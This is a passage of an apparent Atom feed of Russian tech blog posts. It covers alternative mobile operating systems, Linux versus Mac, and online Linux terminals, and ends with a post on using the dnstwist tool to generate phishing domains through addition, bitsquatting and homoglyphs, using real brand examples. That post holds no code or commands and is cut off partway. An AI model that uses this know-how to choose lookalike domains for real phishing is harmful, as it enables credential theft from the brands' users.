  &lt;p&gt;Первыми устройствами на базе Sailfish OS стали смартфоны Jolla, получившие горячую поддержку поклонников Nokia. Сегодня данную операционную систему официально поддерживает более десяти мобильных устройств. Хотя Sailfish OS имеет закрытый исходный код, ее вполне можно рассматривать, как альтернативу Android, iOS и Windows.&lt;/p&gt;
  &lt;h3&gt;&lt;strong&gt;Firefox OS [продажи прекращены]&lt;/strong&gt;&lt;/h3&gt;
  &lt;figure class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://helpugroup.ru/wp-content/uploads/2019/04/firefox_os.jpeg&quot; width=&quot;700&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Несложно догадаться, что Firefox OS является опенсорс-проектом компании Mozilla, создателем интернет-браузера Mozilla Firefox. В свое время объявление о выпуске смартфонов на базе Firefox OS стоимостью всего 25$ наделало немало шума. Целевой аудиторией проекта были развивающиеся рынки вроде Бразилии и Индии. К сожалению, оказалось, что для повторения успеха Raspberry Pi одного лишь низкого ценника недостаточно. Как и в случае с Tizen, устройства ZTE на основе Firefox OS не обрели популярности и в конце 2015 года Mozilla прекратила их продажи. Однако эксперименты с Firefox OS продолжаются.&lt;/p&gt;
  &lt;h3&gt;&lt;strong&gt;Ubuntu Touch [поддерживается сообществом]&lt;/strong&gt;&lt;/h3&gt;
  &lt;figure class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://helpugroup.ru/wp-content/uploads/2019/04/Ubuntu-touch.jpg&quot; width=&quot;700&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;В 2013 году король десктопных операционных систем Linux обзавелся мобильной версией — Ubuntu Touch. Компания Canonical запустила краудфандинговую кампанию, намереваясь собрать 32 миллиона долларов на разработку первого смартфона Ubuntu — Edge. Собрать удалось только 12 миллионов, но и эта сумма стала рекордной.&lt;/p&gt;
  &lt;p&gt;После провалившейся краудфандинговой кампании Canonical удалось выпустить Ubuntu Phone совместно с испанским производителем мобильных устройств bq и китайским — Meizu.Впоследствии появилось и несколько других моделей на Ubuntu Touch. В 2017 году в Canonical приняли решение прекратить разработку своей мобильной ОС, но сообщество UBports до сих пор поддерживает Ubuntu Touch на плаву.&lt;/p&gt;

</content></entry><entry><id>saveandbetray:BJlWnYUFV</id><link rel="alternate" type="text/html" href="https://teletype.in/@saveandbetray/BJlWnYUFV?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=saveandbetray"></link><title>7 преимуществ Linux перед Mac</title><published>2019-04-06T20:28:39.611Z</published><updated>2019-04-06T20:28:39.611Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://teletype.in/files/e1/e11aafbc-a5bc-46cd-b602-616f6dbe0083.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://helpugroup.ru/wp-content/uploads/2019/04/Linux-vs-mac-featured.png&quot;&gt;Наш telegram канал : @Save and betray</summary><content type="html">
  &lt;p&gt;Наш telegram канал : &lt;a href=&quot;https://tele.gg/save_and_betray&quot; target=&quot;_blank&quot;&gt;@Save and betray&lt;/a&gt;&lt;/p&gt;
  &lt;p&gt;&lt;a href=&quot;https://tele.gg/joinchat/KIpU6VBtZBYfLi_02wRozg&quot; target=&quot;_blank&quot;&gt;Вступай в наши ряды&lt;/a&gt;&lt;/p&gt;
  &lt;figure class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://helpugroup.ru/wp-content/uploads/2019/04/Linux-vs-mac-featured.png&quot; width=&quot;800&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Как Linux, так и macOS, являются Unixподобными операционными системами, поддерживающими управление командами с помощью командных оболочек Unix, BASH и других. Обе ОС проигрывают Windows по количеству написанных под них приложений и игр. Собственно, на этом сходство между Linux и macOS заканчивается. MacOS нежно любима графическими дизайнерами и видеоредакторами, в то время как Linux пользуется расположением разработчиков и сисадминов.&lt;/p&gt;
  &lt;p&gt;Так какая же из двух систем лучше? Этот вопрос каждый решает для себя. Мы же предлагаем вам ознакомиться с семью практическими и идеологическими преимуществами Linux перед Mac.&lt;/p&gt;
  &lt;h3&gt;&lt;strong&gt; 1. Цена&lt;/strong&gt;&lt;/h3&gt;
  &lt;figure class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://helpugroup.ru/wp-content/uploads/2019/04/linux-vs-mac-1.jpeg&quot; width=&quot;800&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Предположим, что компьютер вам нужен, в основном, для поиска информации в интернете, просмотра фильмов, скачивания фото и создания документов. При этом вы хотите, чтобы ваша операционная система была безопасной.&lt;/p&gt;
  &lt;p&gt;Вы можете удовлетворить свою потребность, купив бюджетный ноутбук/ПК и бесплатно установив на него дистрибутив Linux. Другой вариант — приобрести дорогостоящий MacBook.Какой из этих вариантов лучше? Все зависит от ваших предпочтений.&lt;/p&gt;
  &lt;p&gt;Многие вполне довольны ОС Linux. Однако, если вы, скажем, профессионально занимаетесь музыкой или видеосъемкой, возможно, вам лучше выбрать Mac и тем самым получить доступ к приложениям Logic Pro X и Final Cut Pro.&lt;/p&gt;
  &lt;h3&gt;&lt;strong&gt;2. Возможность выбора компьютера&lt;/strong&gt;&lt;/h3&gt;
  &lt;figure class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://helpugroup.ru/wp-content/uploads/2019/04/linux-vs-mac-4.jpeg&quot; width=&quot;800&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Операционная система Linux распространяется бесплатно. Ее можно установить на компьютеры любой конфигурации. Даже если у вас старый ПК — Linux будет на нем работать. Просто выберите подходящий дистрибутив.&lt;/p&gt;
  &lt;p&gt;А вот Mac OS предназначена исключительно для компьютеров Apple. Если вы решили сами собрать компьютер или приобрести бюджетный ноутбук (с DOS) и установить на них Mac OS, эта затея вам вряд ли удастся.&lt;/p&gt;
  &lt;p&gt;Вообще, способы установить macOS на устройства, отличные от Apple, существуют. Однако процедура это сложная и требующая высокого уровня подготовки. В связи с чем возникает резонный вопрос — а стоит ли оно того?&lt;/p&gt;
  &lt;p&gt;Итак, если установить Linux можно практически на любой ПК, то Mac OS сильно ограничивает вас в выборе.&lt;/p&gt;
  &lt;h3&gt;&lt;strong&gt;3. Безопасность&lt;/strong&gt;&lt;/h3&gt;
  &lt;figure class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://helpugroup.ru/wp-content/uploads/2019/04/linux-vs-mac-2.jpeg&quot; width=&quot;800&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Многие поют дифирамбы безопасности iOS и Mac. Что ж, возможно, эти ОС безопаснее, чем Windows, но Linux в этом плане они уступают. Увы, это не преувеличение. Шпионское и рекламное ПО для macOS существует и его количество растет с каждым днем. Бывали случаи, когда причиной медленной работы компьютера Mac оказывался взломанный браузер.&lt;/p&gt;
  &lt;p&gt;Вообще, безопасных на 100% операционных систем не бывает. Уязвимости есть и у Linux, однако они своевременно и эффективно устраняются. К счастью, в мире Linux пока не существует автозапускающихся и распространяющихся через браузер вирусов. И это еще одна причина использовать Linux, а не Mac.&lt;/p&gt;
  &lt;h3&gt;&lt;strong&gt;4. Персонализация&lt;/strong&gt;&lt;/h3&gt;
  &lt;figure class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://helpugroup.ru/wp-content/uploads/2019/04/linux-vs-mac-3.jpeg&quot; width=&quot;800&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Вам не нравится какой-то элемент ОС Linux? Измените его или вообще удалите. Вот так просто!&lt;/p&gt;
  &lt;p&gt;Допустим, вам не нравится окружение рабочего стола Gnome в Ubuntu 18.04.1. Поменяйте его на KDE Plasma или установите какое-нибудь из расширений Gnome. Mac OS такой свободы персонализации не дает.&lt;/p&gt;
  &lt;p&gt;Кстати, на Linux вы можете даже менять исходный код ОС, что-то добавлять и удалять. Конечно, это потребует определенных технических знаний, но, так или иначе, у вас есть возможность создать собственную персонализированную ОС. А есть ли она на Mac OS?&lt;/p&gt;
  &lt;p&gt;Кроме того, Linux имеет множество дистрибутивов, направленных на решение разных задач. Например, если вам нужно копировать интерфейс Mac OS, на помощь придет дистрибутив Elementary OS. Хотите установить легковесный дистрибутив Linux на старый компьютер? У вас есть как минимум 10 вариантов. Mac OS такой гибкостью не отличается.&lt;/p&gt;
  &lt;h3&gt;&lt;strong&gt;5. Помощь в построении карьеры [в сфере IT]&lt;/strong&gt;&lt;/h3&gt;
  &lt;figure class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://helpugroup.ru/wp-content/uploads/2019/04/linux-vs-mac-5.jpeg&quot; width=&quot;800&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Данный пункт несколько спорный и относится, прежде всего, к студентам и молодым специалистам в области IT-технологий.&lt;/p&gt;
  &lt;p&gt;В процессе изучения ОС Linux вы получите ценный опыт, который пригодится вам при устройстве на работу. Любой IT-специалист должен уметь работать с терминалом, ориентироваться в файловой системе и устанавливать программы с помощью командной строки. Сами того не осознавая, вы научитесь тому, чему IT-компании специально обучают новых сотрудников.&lt;/p&gt;
  &lt;p&gt;Кроме того, зная Linux, вы сможете овладеть и множеством смежных технологий типа Cloud, Kubernetes или Sysadmin, и получить соответствующие сертификаты. С таким «багажом» шансы найти хорошую работу значительно возрастут!&lt;/p&gt;
  &lt;h3&gt;&lt;strong&gt;6. Надежность&lt;/strong&gt;&lt;/h3&gt;
  &lt;figure class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://helpugroup.ru/wp-content/uploads/2019/04/linux-vs-mac-6.jpeg&quot; width=&quot;800&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Вы когда-нибудь задумывались, почему Linux работает лучше других операционных систем на любом сервере? Потому что эта ОС самая стабильная! Почему Linux стабильнее, чем Mac OS?&lt;/p&gt;
  &lt;p&gt;Ответ прост — потому что она дает пользователю больше полномочий и одновременно защищает его данные. Mac OS не позволяет полностью управлять своей платформой, что облегчает ее использование и улучшает пользовательский опыт. На Linux вы можете делать все, что хотите, что (в некоторых случаях) может сказаться на пользовательском опыте негативно. Зато вы получаете более высокую надежность.&lt;/p&gt;
  &lt;h3&gt;&lt;strong&gt;7. Открытый исходный код&lt;/strong&gt;&lt;/h3&gt;
  &lt;figure class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://helpugroup.ru/wp-content/uploads/2019/04/linux-vs-mac-7.jpeg&quot; width=&quot;800&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Данный аспект заботит не каждого пользователя. Но для некоторых наличие открытого исходного кода является принципиальным моментом. Тем более, что многие из перечисленных достоинств Linux напрямую связаны с «опенсорсностью» этой операционной системы.&lt;/p&gt;
  &lt;p&gt;Для тех, кто не в курсе, поясним: ПО с открытым исходным кодом позволяет видеть и вносить изменения в код программы. В случае с Mac такие действия доступны исключительно компании Apple. Даже если вы обладаете всеми необходимыми знаниями, посмотреть исходный код Mac OS у вас не получится.&lt;/p&gt;
  &lt;p&gt;Иными словами, пользуясь Mac, вы получаете автомобиль, но не можете заглянуть под капот. И это печально.&lt;/p&gt;
  &lt;h2&gt;&lt;strong&gt;Заключение&lt;/strong&gt;&lt;/h2&gt;
  &lt;p&gt;Итак, теперь вы знаете, чем Linux лучше Mac OS. Каковы ваши мысли по этому поводу? Достаточно ли названных причин, чтобы вы предпочли Linux Mac OS? Если нет, то какая ОС вам нравится и почему?&lt;/p&gt;

</content></entry><entry><id>saveandbetray:HkvKF1EY4</id><link rel="alternate" type="text/html" href="https://teletype.in/@saveandbetray/HkvKF1EY4?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=saveandbetray"></link><title>Лучшие онлайн терминалы Linux и редакторы Bash</title><published>2019-04-04T20:32:38.336Z</published><updated>2019-04-04T20:35:09.797Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://teletype.in/files/5b/5bf3e6fa-9fcc-466d-aa5b-580ed58de7c8.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://teletype.in/files/a0/a080f020-aeeb-4bdc-aa52-901f8c58f58b.jpeg&quot;&gt;Наш telegram канал : @Save and betray</summary><content type="html">
  &lt;p&gt;Наш telegram канал : &lt;a href=&quot;https://tele.gg/save_and_betray&quot; target=&quot;_blank&quot;&gt;@Save and betray&lt;/a&gt;&lt;/p&gt;
  &lt;p&gt;&lt;a href=&quot;https://tele.gg/joinchat/KIpU6VBtZBYfLi_02wRozg&quot; target=&quot;_blank&quot;&gt;Вступай в наши ряды&lt;/a&gt;&lt;/p&gt;
  &lt;figure class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://teletype.in/files/a0/a080f020-aeeb-4bdc-aa52-901f8c58f58b.jpeg&quot; width=&quot;1280&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Если вы хотите попрактиковать команды Linux или проанализировать/протестировать сценарии оболочки, вам на помощь придут онлайн терминалы Linux и компиляторы bash. Данные инструменты будут особенно полезны тем, кто пользуется операционной системой Windows. Конечно, можно просто установить Linux в Windows с помощью подсистемы Windows для Linux, но для быстрых тестов онлайн-терминалы Linux удобнее.&lt;/p&gt;
  &lt;figure class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://helpugroup.ru/wp-content/uploads/2019/04/online-linux-terminals.jpeg&quot; width=&quot;800&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Где можно бесплатно скачать консоль Linux? И какую оболочку Linux лучше использовать?Чтобы вам не пришлось искать ответы на эти вопросы, мы составили список лучших онлайн-эмуляторов Linux, а также отдельный список лучших онлайн-редакторов bash. &lt;strong&gt;Примечание&lt;/strong&gt;: Все представленные ниже терминалы поддерживают несколько браузеров, включая Google Chrome, Mozilla Firefox, Opera и Microsoft Edge.&lt;/p&gt;
  &lt;h2&gt;&lt;strong&gt;Лучшие онлайн-терминалы для изучения команд Linux&lt;/strong&gt;&lt;/h2&gt;
  &lt;p&gt;Итак, обратимся сначала к Linux-терминалам. Перечисленные ниже ресурсы позволяют практиковать команды Linux в веб-браузере. Некоторые из них требуют регистрации.&lt;/p&gt;
  &lt;h3&gt;&lt;strong&gt;1. JSLinux&lt;/strong&gt;&lt;/h3&gt;
  &lt;figure class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://helpugroup.ru/wp-content/uploads/2019/04/jslinux-online-linux-terminal.jpg&quot; width=&quot;800&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;JSLinux — это не просто терминал Linux, а полноценный виртуальный компьютер с эмуляцией процессора в браузере. JSLinux позволяет загружать на виртуальную машину файлы. Для создания встроенной системы Linux используется инструмент Buildroot. Как следует из названия, JSLinux полностью написан на JavaScript. Вы можете выбрать систему, основанную на консоли или GUI. Для того, чтобы практиковать команды Linux, нужно выбрать ту, что на консоли. Чтобы воспользоваться программой, придется зарегистрироваться.&lt;/p&gt;
  &lt;h3&gt;&lt;strong&gt;2. Copy.sh&lt;/strong&gt;&lt;/h3&gt;
  &lt;figure class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://helpugroup.ru/wp-content/uploads/2019/04/copy-sh-online-linux-terminal.jpg&quot; width=&quot;800&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Copy.sh — один из лучших онлайн-эмуляторов Linux, быстрый и надежный. Программа выложена на GitHub и активно поддерживается разработчиками, что не может не радовать. Она совместима и с другими операционные системами, в частности:&lt;/p&gt;
  &lt;ul&gt;
    &lt;li&gt;Windows 98&lt;/li&gt;
    &lt;li&gt;KolibriOS&lt;/li&gt;
    &lt;li&gt;FreeDOS&lt;/li&gt;
    &lt;li&gt;Windows 1.01&lt;/li&gt;
    &lt;li&gt;Archlinux&lt;/li&gt;
  &lt;/ul&gt;
  &lt;h3&gt;&lt;strong&gt;3. Webminal&lt;/strong&gt;&lt;/h3&gt;
  &lt;figure class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://helpugroup.ru/wp-content/uploads/2019/04/webminal.jpg&quot; width=&quot;674&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Webminal тоже является отличным онлайн-терминалом, который можно смело рекомендовать новичкам для отработки команд Linux. Удобство ресурса состоит в том, что он содержит несколько уроков по обучению Linux-командам. Таким образом, в процессе обучения вам не придется переключаться между окнами разных сайтов или делить одно окно на две части. Все будет в одном месте — в одной и той вкладке браузера.&lt;/p&gt;
  &lt;h3&gt;&lt;strong&gt;4. Tutorialspoint Unix Terminal&lt;/strong&gt;&lt;/h3&gt;
  &lt;figure class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://helpugroup.ru/wp-content/uploads/2019/04/coding-ground-tutorialspoint-online-linux-terminal.jpg&quot; width=&quot;633&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Tutorialspoint — это очень популярный ресурс, предлагающий ценные и при этом бесплатные руководства по изучению практически всех языков программирования (и не только).Неудивительно, что здесь вы найдете и бесплатную Linux-консоль для отработки команд с использованием материалов сайта. Вы также сможете загружать файлы. Tutorialspoint Unix Terminal — простой, но полезный онлайн-терминал. Кроме того, на странице Coding Ground представлено много других онлайн-терминалов.&lt;/p&gt;
  &lt;h3&gt;&lt;strong&gt;5. JS/UIX&lt;/strong&gt;&lt;/h3&gt;
  &lt;figure class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://helpugroup.ru/wp-content/uploads/2019/04/JS-UIX-online-linux-terminal.jpg&quot; width=&quot;743&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Еще один терминал Linux — JS/UIX — написан полностью на JavaScript без каких-либо плагинов. С помощью виртуальной машины вы сможете практиковать команды Linux, изучать сценарии оболочки, файловую систему и т.д.&lt;/p&gt;
  &lt;h3&gt;&lt;strong&gt;6. CB.VU&lt;/strong&gt;&lt;/h3&gt;
  &lt;figure class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://helpugroup.ru/wp-content/uploads/2019/04/cb-vu-online-linux-terminal.jpg&quot; width=&quot;721&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Для пользователей ОС FreeBSD стабильной версии 7.1 подойдет эмулятор cb.vu. В нем есть только базовый функционал, ничего лишнего. Вы просто вводите команды Linux и получаете соответствующий вывод. К сожалению, возможности загружать файлы тоже не предусмотрено.&lt;/p&gt;
  &lt;h3&gt;&lt;strong&gt;7. Linux Containers&lt;/strong&gt;&lt;/h3&gt;
  &lt;figure class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://helpugroup.ru/wp-content/uploads/2019/04/linux-containers-terminal.jpg&quot; width=&quot;800&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Linux Containers — один из лучших онлайн-терминалов Linux, предоставляющий для изучения команд Linux демо-сервер с 30-минутным таймером обратного отсчета. Проект спонсируется компанией Canonical.&lt;/p&gt;
  &lt;h3&gt;&lt;strong&gt;8. Codeanywhere&lt;/strong&gt;&lt;/h3&gt;
  &lt;figure class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://helpugroup.ru/wp-content/uploads/2019/04/codeanywhere-terminal.jpg&quot; width=&quot;706&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Сервис Codeanywhere предлагает кроссплатформенные облачные IDE. Чтобы не платить за использование виртуальной машины Linux, потребуется регистрация на сайте. Выберите бесплатный тариф и создайте новое соединение, настроив контейнер с нужной вам ОС. Бесплатная Linux-консоль будет в вашем распоряжении.&lt;/p&gt;
  &lt;h2&gt;&lt;strong&gt;Лучшие онлайн-редакторы Bash&lt;/strong&gt;&lt;/h2&gt;
  &lt;p&gt;Стоп! А разве онлайн-терминалы Linux не подходят для написания сценариев Bash? Подходят. Только вот создавать, а затем выполнять bash-скрипты в терминале не так удобно, как в редакторе Bash. С помощью bash-редакторов можно легко написать сценарий оболочки, а затем проверить, как он работает. Давайте посмотрим, какие программы позволяют запускать сценарии оболочки онлайн.&lt;/p&gt;
  &lt;h3&gt;&lt;strong&gt;Tutorialspoint Bash Compiler&lt;/strong&gt;&lt;/h3&gt;
  &lt;figure class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://helpugroup.ru/wp-content/uploads/2019/04/tutorialspoint-bash-compiler.jpg&quot; width=&quot;799&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Как уже говорилось, помимо онлайн-эмулятора, Tutorialspoint предлагает много чего другого, в том числе и компилятор Bash. Это очень простой компилятор, позволяющий выполнять сценарии оболочки онлайн.&lt;/p&gt;
  &lt;h3&gt;&lt;strong&gt;JDOODLE&lt;/strong&gt;&lt;/h3&gt;
  &lt;figure class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://helpugroup.ru/wp-content/uploads/2019/04/jdoodle-online-bash-editor.jpg&quot; width=&quot;788&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;JDOODLE — это еще один полезный онлайновый Bash-редактор, где можно тестировать скрипты Bash. JDOODLE предлагает и другие IDE, но нас, прежде всего, интересует выполнение Bash-скриптов. Задайте аргументы командной строки и стандартный ввод, и вы получите результат вашего кода.&lt;/p&gt;
  &lt;h3&gt;&lt;strong&gt;Paiza.io&lt;/strong&gt;&lt;/h3&gt;
  &lt;figure class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://helpugroup.ru/wp-content/uploads/2019/04/paizo-io-bash-editor.jpg&quot; width=&quot;800&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Paiza.io — хороший онлайновый Bash-редактор, опробовать который можно бесплатно. Для доступа к дополнительным функциям, например, планированию задач, потребуется регистрация. Сайт также поддерживает совместную работу в режиме реального времени (правда, пока данная возможность доступна только в режиме тестирования). Кроме того, на paiza.cloud есть и онлайн-терминал Linux.&lt;/p&gt;
  &lt;h3&gt;&lt;strong&gt;ShellCheck&lt;/strong&gt;&lt;/h3&gt;
  &lt;figure class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://helpugroup.ru/wp-content/uploads/2019/04/shell-check-bash-analyzer.jpg&quot; width=&quot;800&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Интересный редактор Bash — ShellCheck — позволяет находить ошибки в сценариях оболочки. Программа выложена на GitHub и ее можно устанавливать локально на поддерживаемых платформах.&lt;/p&gt;
  &lt;h3&gt;&lt;strong&gt;Rextester&lt;/strong&gt;&lt;/h3&gt;
  &lt;figure class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://helpugroup.ru/wp-content/uploads/2019/04/rextester-bash-editor.jpg&quot; width=&quot;800&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Если вам нужен предельно простой онлайновый Bash-компилятор, выбирайте Rextester. Он также поддерживает и другие языки программирования.&lt;/p&gt;
  &lt;h3&gt;&lt;strong&gt;Learnshell&lt;/strong&gt;&lt;/h3&gt;
  &lt;figure class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://helpugroup.ru/wp-content/uploads/2019/04/learnshell-online-bash-shell.jpg&quot; width=&quot;621&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Как и Webminal, Learnshell предоставляет пользователям учебные материалы и одновременно позволяет тестировать собственный код. Программа имеет как базовые, так и некоторые продвинутые функции.&lt;/p&gt;
  &lt;h2&gt;&lt;strong&gt;Заключение&lt;/strong&gt;&lt;/h2&gt;
  &lt;p&gt;Теперь вы знакомы с наиболее надежными и быстрыми онлайн терминалами Linux и Bash-редакторами. Обучайтесь, тренируйтесь и «играйте» с кодом! Не нашли в списке свой любимый онлайн терминал Linux или компилятор Bash? Напишите нам об этом в коммен��ариях.&lt;/p&gt;

</content></entry><entry><id>saveandbetray:rywFFuGK4</id><link rel="alternate" type="text/html" href="https://teletype.in/@saveandbetray/rywFFuGK4?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=saveandbetray"></link><title>Как легко и просто сгенерировать сотни фишинговых доменов</title><published>2019-04-03T18:20:47.023Z</published><updated>2019-04-03T18:21:08.630Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://teletype.in/files/f9/f92fe0a9-1bf1-4c3f-90a6-5d7548eb005c.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://teletype.in/files/1f/1fe3d52b-dc31-4d66-8bb3-06c652f2126a.jpeg&quot;&gt;Наш telegram канал : @Save and betray</summary><content type="html">
  &lt;p&gt;Наш telegram канал : &lt;a href=&quot;https://tele.gg/save_and_betray&quot; target=&quot;_blank&quot;&gt;@Save and betray&lt;/a&gt;&lt;/p&gt;
  &lt;p&gt;&lt;a href=&quot;https://tele.gg/joinchat/KIpU6VBtZBYfLi_02wRozg&quot; target=&quot;_blank&quot;&gt;Вступай в наши ряды&lt;/a&gt;&lt;/p&gt;
  &lt;figure class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://teletype.in/files/1f/1fe3d52b-dc31-4d66-8bb3-06c652f2126a.jpeg&quot; width=&quot;1280&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;&lt;a href=&quot;https://helpugroup.ru/goto/https://github.com/elceef/dnstwist&quot; target=&quot;_blank&quot;&gt;Dnstwist&lt;/a&gt;, созданная &lt;a href=&quot;https://helpugroup.ru/goto/https://twitter.com/elceef&quot; target=&quot;_blank&quot;&gt;@elceef&lt;/a&gt; — поисковая утилита, работа которой основана на перестановках букв в названии доменов. Она в состоянии обнаружить фишинговые домены, &lt;a href=&quot;https://helpugroup.ru/goto/https://en.wikipedia.org/wiki/Cybersquatting&quot; target=&quot;_blank&quot;&gt;bitsquatting&lt;/a&gt;, &lt;a href=&quot;https://helpugroup.ru/goto/https://en.wikipedia.org/wiki/Typosquatting&quot; target=&quot;_blank&quot;&gt;Typosquatting&lt;/a&gt; и мошеннические веб-сайты с похожими доменными именами. Dnstwist на вход получает заданное доменное имя, а затем генерирует список потенциальных фишинговых доменов. Потом по сгенерированным доменным именам делаются запросы. Если обнаруженный домен перенаправляет запрос на веб-сервер, то Dnstwist запишет IP-адрес домена.&lt;/p&gt;
  &lt;p&gt;Как и большинство инструментов, предназначенных для тестирования на проникновение, Dnstwist — это палка о двух концах. Она может использоваться злоумышленниками для поиска идеальных доменов-кандидатов для проведения фишинговых атак, в ходе которых они могут клонировать целевой веб-сайт и заставить пользователей ввести свои учетные данные. Или же Dnstwist могут использовать специалисты по кибербезопасности и системные администраторы для того, чтобы быстро найти и определить похожие домены, созданные конкурентами и хакерами.&lt;/p&gt;
  &lt;h2&gt;&lt;strong&gt;Поддерживаемые схемы доменных имен&lt;/strong&gt;&lt;/h2&gt;
  &lt;p&gt;Dsntwist поддерживает широкий круг создания фишинговых доменных схем и их типов, которые он может использовать для создания огромных списков потенциальных фишинговых доменов. Прежде чем переходить к инструкции по генерации доменных имен, посмотрим на каждую такую схему.&lt;/p&gt;
  &lt;h2&gt;&lt;strong&gt;1. Добавление&lt;/strong&gt;&lt;/h2&gt;
  &lt;p&gt;Буквы добавляются в конце исходного доменного имени. Ниже приведен пример Bank of America, одного из крупнейших банков в Соединенных Штатах. В отличие от некоторых других вариантов, приведенных ниже, простое дополнение достаточно легко выявляется конечными пользователями даже при беглом взгляде на URL.&lt;/p&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://helpugroup.ru/wp-content/uploads/2018/05/easily-generate-hundreds-phishing-domains.w1456.jpg&quot; width=&quot;791&quot; /&gt;
  &lt;/figure&gt;
  &lt;h2&gt;&lt;strong&gt;2. Бит-сквоттинг&lt;/strong&gt;&lt;/h2&gt;
  &lt;p&gt;Bitsquatting относится к регистрации доменных имен, отличающихся от настоящего домена всего на 1 бит. На скриншоте ниже приведен пример для Википедии — популярного и крупнейшего общего справочного сайта в Интернете. Определить подмену при беглом осмотре уже немного сложнее, чем в случае с «дополнением», потому что люди скорее не читают, а угадывают слова на основе первой и последней буквы, а не прочитывают каждую букву индивидуально.&lt;/p&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://helpugroup.ru/wp-content/uploads/2018/05/easily-generate-hundreds-phishing-domains.w1456-1.jpg&quot; width=&quot;758&quot; /&gt;
  &lt;/figure&gt;
  &lt;h2&gt;&lt;strong&gt;3. Гомоглифы (homoglyph)&lt;/strong&gt;&lt;/h2&gt;
  &lt;p&gt;Фишинг-атаки с использованием гомоглифов называются гомографическими атаками, хотя альтернативные символы называются гомоглифами, а не гомографами. Гомоглиф — одна из двух или больше графем, знаков или глифов с формами, которые или кажутся идентичными, или не могут быть дифференцированы быстрым визуальным осмотром. Например, русская «а» и английская «a» — гомоглифы. Эти типы атак по-прежнему затрагивают Firefox и большинство Android-устройств, а недавно они стали известны благодаря &lt;a href=&quot;https://helpugroup.ru/goto/https://www.xudongz.com/blog/2017/idn-phishing/&quot; target=&quot;_blank&quot;&gt;Xudong Zheng&lt;/a&gt;, который создал первый фишинговый гомоглиф-адрес для apple.com. Используя Facebook в качестве примера, мы обнаружили, что имеется довольно много доменов для гомоглиф-фишинга, доступных за 11 долларов.&lt;/p&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://helpugroup.ru/wp-content/uploads/2018/05/easily-generate-hundreds-phishing-domains.w1456-2.jpg&quot; width=&quot;754&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Чтобы проверить найденное доменное имя по базе данных регистраторов доменов, скопируйте и вставьте нужный домен из терминала Dnstwist в панель поиска регистратора.&lt;/p&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://helpugroup.ru/wp-content/uploads/2018/05/easily-generate-hundreds-phishing-domains.w1456-3.jpg&quot; width=&quot;734&quot; /&gt;
  &lt;/figure&gt;
  &lt;h2&gt;&lt;strong&gt;4. Пропуск&lt;/strong&gt;&lt;/h2&gt;
